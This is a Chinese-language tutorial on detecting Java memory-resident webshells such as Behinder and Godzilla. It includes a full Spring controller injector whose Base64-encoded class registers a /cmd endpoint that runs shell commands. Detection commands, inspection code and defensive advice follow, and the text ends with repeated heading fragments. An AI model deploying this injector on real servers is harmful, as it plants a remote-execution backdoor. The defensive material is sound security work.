内存马查杀技术详解：以冰蝎和哥斯拉为例<\/h1>

一、内存马概述<\/h2>
内存马（Memory Shell）是一种驻留在服务器内存中的恶意程序，不依赖文件系统，通过动态注入技术实现持久化攻击。主要特点包括：<\/p>
无文件落地，传统杀毒软件难以检测<\/li>
通过反射等技术动态修改内存中的类<\/li>
通常伪装成Web组件（Filter、Servlet、Controller等）<\/li> <\/ul>
二、内存马注入技术<\/h2>

1. 动态注入Web组件<\/h3>
通过创建并注册以下Java Web组件实现：<\/p>
Listener<\/li>
Filter<\/li>
Servlet<\/li>
Valve<\/li>
Spring Controller<\/li> <\/ul>
2. 通过Instrument修改内存class<\/h3>
使用Java Instrumentation API直接修改已加载类的字节码<\/p>

三、Spring内存马注入实例分析<\/h2>

1. 注入Spring Controller示例代码<\/h3>
package<\/span> com.example.testspring;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> org.springframework.web.bind.annotation.GetMapping;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.bind.annotation.RequestMethod;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.bind.annotation.RestController;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.context.WebApplicationContext;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.context.request.RequestContextHolder;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.context.request.ServletRequestAttributes;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.servlet.mvc.condition.*;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.servlet.mvc.method.RequestMappingInfo;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.servlet.support.RequestContextUtils;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.util.pattern.PathPatternParser;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Method;<\/span>
<\/span><\/span>import<\/span> java.util.Base64;<\/span>
<\/span><\/span>
<\/span><\/span>@RestController<\/span>
<\/span><\/span>public<\/span> class<\/span> TestController<\/span> {<\/span>
<\/span><\/span>    @GetMapping<\/span>(<\/span>"\/add_controller"<\/span>)<\/span>
<\/span><\/span>    public<\/span> String hello<\/span>()<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            String className =<\/span> "com.example.spring.InjectControl"<\/span>;<\/span>
<\/span><\/span>            \/\/ 加载恶意类的Base64编码字节码
<\/span><\/span><\/span><\/span>            String b64 =<\/span> "yv66vgAAADQAiQoAIQBFCABGCwBHAEgLAEkASggASwgATAoATQBOCgAMAE8IAFAKAAwAUQcAUgcAUwgAVAgAVQoACwBWCABXCABYBwBZCgALAFoKAFsAXAoAEgBdCABeCgASAF8KABIAYAoAEgBhCgASAGIKAGMAZAoAYwBlCgBjAGILAEkAZgcAZwcAaAcAaQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAiTGNvbS9leGFtcGxlL3NwcmluZy9JbmplY3RDb250cm9sOwEABWxvZ2luAQBSKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTspVgEAAXABABpMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwEAAW8BABJMamF2YS9sYW5nL1N0cmluZzsBAAFjAQATTGphdmEvdXRpbC9TY2FubmVyOwEABGFyZzABAAZ3cml0ZXIBABVMamF2YS9pby9QcmludFdyaXRlcjsBAAdyZXF1ZXN0AQAnTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQAIcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQANU3RhY2tNYXBUYWJsZQcAUwcAagcAUgcAWQcAZwEAGVJ1bnRpbWVWaXNpYmxlQW5ub3RhdGlvbnMBADhMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvYmluZC9hbm5vdGF0aW9uL1JlcXVlc3RNYXBwaW5nOwEABXZhbHVlAQAIL2Zhdmljb24BAApTb3VyY2VGaWxlAQASSW5qZWN0Q29udHJvbC5qYXZhAQArTG9yZy9zcHJpbmdmcmFtZXdvcmsvc3RlcmVvdHlwZS9Db250cm9sbGVyOwwAIgAjAQADY21kBwBrDABsAG0HAG4MAG8AcAEAAAEAB29zLm5hbWUHAHEMAHIAbQwAcwB0AQADd2luDAB1AHYBABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIBABBqYXZhL2xhbmcvU3RyaW5nAQAHY21kLmV4ZQEAAi9jDAAiAHcBAAcvYmluL3NoAQACLWMBABFqYXZhL3V0aWwvU2Nhbm5lcgwAeAB5BwB6DAB7AHwMACIAfQEAAlxBDAB+AH8MAIAAgQwAggB0DACDACMHAGoMAIQAhQwAhgAjDACHAIgBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAgY29tL2V4YW1wbGUvc3ByaW5nL0luamVjdENvbnRyb2wBABBqYXZhL2xhbmcvT2JqZWN0AQATamF2YS9pby9QcmludFdyaXRlcgEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBAAt0b0xvd2VyQ2FzZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAFc3RhcnQBABUoKUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAAdoYXNOZXh0AQADKClaAQAEbmV4dAEABWNsb3NlAQAFd3JpdGUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAAVmbHVzaAEACXNlbmRFcnJvcgEABChJKVYAIQAgACEAAAAAAAIAAQAiACMAAQAkAAAALwABAAEAAAAFKrcAAbEAAAACACUAAAAGAAEAAAAKACYAAAAMAAEAAAAFACcAKAAAAAEAKQAqAAIAJAAAAagABgAIAAAAsysSArkAAwIATiy5AAQBADoELcYAkxIFOgUSBrgAB7YACBIJtgAKmQAhuwALWQa9AAxZAxINU1kEEg5TWQUtU7cADzoGpwAeuwALWQa9AAxZAxIQU1kEEhFTWQUtU7cADzoGuwASWRkGtgATtgAUtwAVEha2ABc6BxkHtgAYmQALGQe2ABmnAAUZBToFGQe2ABoZBBkFtgAbGQS2ABwZBLYAHacADCwRAZS5AB4CAKcABE6xAAEAAACuALEAHwADACUAAABKABIAAAAOAAkADwARABAAFQARABkAEwApABQARwAWAGIAGAB4ABkAjAAaAJEAGwCYABwAnQAdAKIAHgClAB8ArgAiALEAIQCyACMAJgAAAFwACQBEAAMAKwAsAAYAGQCJAC0ALgAFAGIAQAArACwABgB4ACoALwAwAAcACQClADEALgADABEAnQAyADMABAAAALMAJwAoAAAAAACzADQANQABAAAAswA2ADcAAgA4AAAAKQAI\/gBHBwA5BwA6BwA5\/AAaBwA7\/AAlBwA8QQcAOfgAGvkAGEIHAD0AAD4AAAAOAAEAPwABAEBbAAFzAEEAAgBCAAAAAgBDAD4AAAAGAAEARAAA"<\/span>;<\/span>
<\/span><\/span>            byte<\/span>[]<\/span> bytes =<\/span> Base64.<\/span>getDecoder<\/span>().<\/span>decode<\/span>(<\/span>b64);<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 使用ClassLoader动态加载恶意类
<\/span><\/span><\/span><\/span>            java.<\/span>lang<\/span>.<\/span>ClassLoader<\/span> classLoader =<\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>();<\/span>
<\/span><\/span>            java.<\/span>lang<\/span>.<\/span>reflect<\/span>.<\/span>Method<\/span> m0 =<\/span> ClassLoader.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"defineClass"<\/span>,<\/span> String.<\/span>class<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>);<\/span>
<\/span><\/span>            m0.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            try<\/span> {<\/span>
<\/span><\/span>                m0.<\/span>invoke<\/span>(<\/span>classLoader,<\/span> className,<\/span> bytes,<\/span> 0<\/span>,<\/span> bytes.<\/span>length<\/span>);<\/span>
<\/span><\/span>            }<\/span>catch<\/span> (<\/span>Exception e){<\/span> }<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 获取Spring上下文
<\/span><\/span><\/span><\/span>            WebApplicationContext context =<\/span> RequestContextUtils.<\/span>findWebApplicationContext<\/span>(((<\/span>ServletRequestAttributes)<\/span> RequestContextHolder.<\/span>currentRequestAttributes<\/span>()).<\/span>getRequest<\/span>());<\/span>
<\/span><\/span>            org.<\/span>springframework<\/span>.<\/span>web<\/span>.<\/span>servlet<\/span>.<\/span>handler<\/span>.<\/span>AbstractHandlerMapping<\/span> abstractHandlerMapping =<\/span> (<\/span>org.<\/span>springframework<\/span>.<\/span>web<\/span>.<\/span>servlet<\/span>.<\/span>handler<\/span>.<\/span>AbstractHandlerMapping<\/span>)<\/span> context.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span>
<\/span><\/span>            RequestMappingHandlerMapping r =<\/span> context.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 通过反射获得自定义controller中唯一的Method对象
<\/span><\/span><\/span><\/span>            Method method =<\/span> (<\/span>classLoader.<\/span>loadClass<\/span>(<\/span>className).<\/span>getDeclaredMethods<\/span>())[<\/span>0<\/span>];<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 在内存中动态注册controller
<\/span><\/span><\/span><\/span>            Class<?><\/span> class1 =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.web.servlet.mvc.method.RequestMappingInfo"<\/span>);<\/span>
<\/span><\/span>            Constructor<?><\/span> method1 =<\/span> class1.<\/span>getDeclaredConstructor<\/span>(<\/span>String.<\/span>class<\/span>,<\/span> PathPatternsRequestCondition.<\/span>class<\/span>,<\/span> PatternsRequestCondition.<\/span>class<\/span>,<\/span> RequestMethodsRequestCondition.<\/span>class<\/span>,<\/span> ParamsRequestCondition.<\/span>class<\/span>,<\/span> HeadersRequestCondition.<\/span>class<\/span>,<\/span> ConsumesRequestCondition.<\/span>class<\/span>,<\/span> ProducesRequestCondition.<\/span>class<\/span>,<\/span> RequestConditionHolder.<\/span>class<\/span>,<\/span> RequestMappingInfo.<\/span>BuilderConfiguration<\/span>.<\/span>class<\/span>);<\/span>
<\/span><\/span>            method1.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            
<\/span><\/span>            RequestMappingInfo info =<\/span> (<\/span>RequestMappingInfo)<\/span> method1.<\/span>newInstance<\/span>(<\/span>
<\/span><\/span>                "test"<\/span>,<\/span>
<\/span><\/span>                new<\/span> PathPatternsRequestCondition(<\/span>new<\/span> PathPatternParser(),<\/span>"\/cmd"<\/span>),<\/span>
<\/span><\/span>                null<\/span>,<\/span>
<\/span><\/span>                new<\/span> RequestMethodsRequestCondition(<\/span>RequestMethod.<\/span>GET<\/span>),<\/span>
<\/span><\/span>                new<\/span> ParamsRequestCondition(),<\/span>
<\/span><\/span>                new<\/span> HeadersRequestCondition(),<\/span>
<\/span><\/span>                new<\/span> ConsumesRequestCondition(),<\/span>
<\/span><\/span>                new<\/span> ProducesRequestCondition(),<\/span>
<\/span><\/span>                new<\/span> RequestConditionHolder(<\/span>null<\/span>),<\/span>
<\/span><\/span>                new<\/span> RequestMappingInfo.<\/span>BuilderConfiguration<\/span>()<\/span>
<\/span><\/span>            );<\/span>
<\/span><\/span>            
<\/span><\/span>            r.<\/span>registerMapping<\/span>(<\/span>info,<\/span> classLoader.<\/span>loadClass<\/span>(<\/span>className).<\/span>newInstance<\/span>(),<\/span> method);<\/span>
<\/span><\/span>            return<\/span> "success"<\/span>;<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            return<\/span> e.<\/span>getMessage<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. 关键注入步骤解析<\/h3>


动态加载恶意类<\/strong>：<\/p>

使用Base64编码的恶意类字节码<\/li>
通过ClassLoader.defineClass方法动态加载<\/li>
<\/ul>
<\/li>

获取Spring上下文<\/strong>：<\/p>

通过RequestContextHolder获取当前请求<\/li>
获取WebApplicationContext和RequestMappingHandlerMapping<\/li>
<\/ul>
<\/li>

构造RequestMappingInfo<\/strong>：<\/p>

使用反射构造Spring MVC的映射信息<\/li>
设置访问路径为\/cmd<\/code><\/li>
<\/ul>
<\/li>

注册恶意Controller<\/strong>：<\/p>

将恶意类注册为Spring Controller<\/li>
映射到特定URL路径<\/li>
<\/ul>
<\/li>
<\/ol>
四、内存马查杀技术<\/h2>
1. 三条关键查杀命令<\/h3>
命令1：查找可疑的Java进程<\/h4>
ps aux | grep java | grep -v grep
<\/span><\/span><\/code><\/pre>
检查异常Java进程<\/li>
关注高CPU\/内存占用的进程<\/li>
<\/ul>
命令2：检查网络连接<\/h4>
netstat -antp | grep java
<\/span><\/span><\/code><\/pre>
查找异常外连IP和端口<\/li>
冰蝎\/哥斯拉通常会有持续连接<\/li>
<\/ul>
命令3：检查Java线程堆栈<\/h4>
jstack <pid> | grep -A 20<\/span> "http"<\/span>
<\/span><\/span><\/code><\/pre>
分析Java线程调用栈<\/li>
查找可疑的HTTP处理线程<\/li>
<\/ul>
2. 进阶查杀技术<\/h3>
(1) 检查Web容器组件<\/h4>
\/\/ 检查Filter
<\/span><\/span><\/span><\/span>Enumeration<<\/span>String><\/span> filters =<\/span> request.<\/span>getServletContext<\/span>().<\/span>getFilterRegistrations<\/span>().<\/span>keys<\/span>();<\/span>
<\/span><\/span>while<\/span> (<\/span>filters.<\/span>hasMoreElements<\/span>())<\/span> {<\/span>
<\/span><\/span>    String filterName =<\/span> filters.<\/span>nextElement<\/span>();<\/span>
<\/span><\/span>    System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Filter: "<\/span> +<\/span> filterName);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 检查Servlet
<\/span><\/span><\/span><\/span>Map<<\/span>String,<\/span> ?<\/span> extends<\/span> ServletRegistration><\/span> servlets =<\/span> request.<\/span>getServletContext<\/span>().<\/span>getServletRegistrations<\/span>();<\/span>
<\/span><\/span>for<\/span> (<\/span>String servletName :<\/span> servlets.<\/span>keySet<\/span>())<\/span> {<\/span>
<\/span><\/span>    System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Servlet: "<\/span> +<\/span> servletName);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>(2) 检查Spring MVC映射<\/h4>
RequestMappingHandlerMapping rmhp =<\/span> applicationContext.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span>
<\/span><\/span>Map<<\/span>RequestMappingInfo,<\/span> HandlerMethod><\/span> handlerMethods =<\/span> rmhp.<\/span>getHandlerMethods<\/span>();<\/span>
<\/span><\/span>for<\/span> (<\/span>Map.<\/span>Entry<\/span><<\/span>RequestMappingInfo,<\/span> HandlerMethod><\/span> entry :<\/span> handlerMethods.<\/span>entrySet<\/span>())<\/span> {<\/span>
<\/span><\/span>    System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Mapping: "<\/span> +<\/span> entry.<\/span>getKey<\/span>()<\/span> +<\/span> " -> "<\/span> +<\/span> entry.<\/span>getValue<\/span>());<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>(3) 内存扫描工具<\/h4>

Arthas<\/li>
JavaMelody<\/li>
Greys<\/li>
<\/ul>
五、防御措施<\/h2>


运行时防护<\/strong>：<\/p>

使用RASP(运行时应用自我保护)技术<\/li>
监控关键API调用(如ClassLoader.defineClass)<\/li>
<\/ul>
<\/li>

代码审计<\/strong>：<\/p>

定期审计Web应用代码<\/li>
检查可疑的反射调用<\/li>
<\/ul>
<\/li>

权限控制<\/strong>：<\/p>

限制Java进程权限<\/li>
使用SecurityManager<\/li>
<\/ul>
<\/li>

监控告警<\/strong>：<\/p>

监控异常URL访问<\/li>
设置内存变化告警<\/li>
<\/ul>
<\/li>
<\/ol>
六、总结<\/h2>
内存马查杀关键在于：<\/p>

理解内存马注入原理<\/li>
掌握Java运行时检测技术<\/li>
熟悉Web容器内部机制<\/li>
使用专业工具辅助分析<\/li>
<\/ol>
通过结合命令行工具和代码级检测，可以有效发现和清除冰蝎、哥斯拉等内存马威胁。<\/p>
内存马查杀技术详解：以冰蝎和哥斯拉为例<\/h1>

二、内存马注入技术<\/h2>

2. 通过Instrument修改内存class<\/h3> 使用Java Instrumentation API直接修改已加载类的字节码<\/p>

三、Spring内存马注入实例分析<\/h2>

四、内存马查杀技术<\/h2>

1. 三条关键查杀命令<\/h3>

2. 进阶查杀技术<\/h3>

2. 通过Instrument修改内存class<\/h3>
使用Java Instrumentation API直接修改已加载类的字节码<\/p>
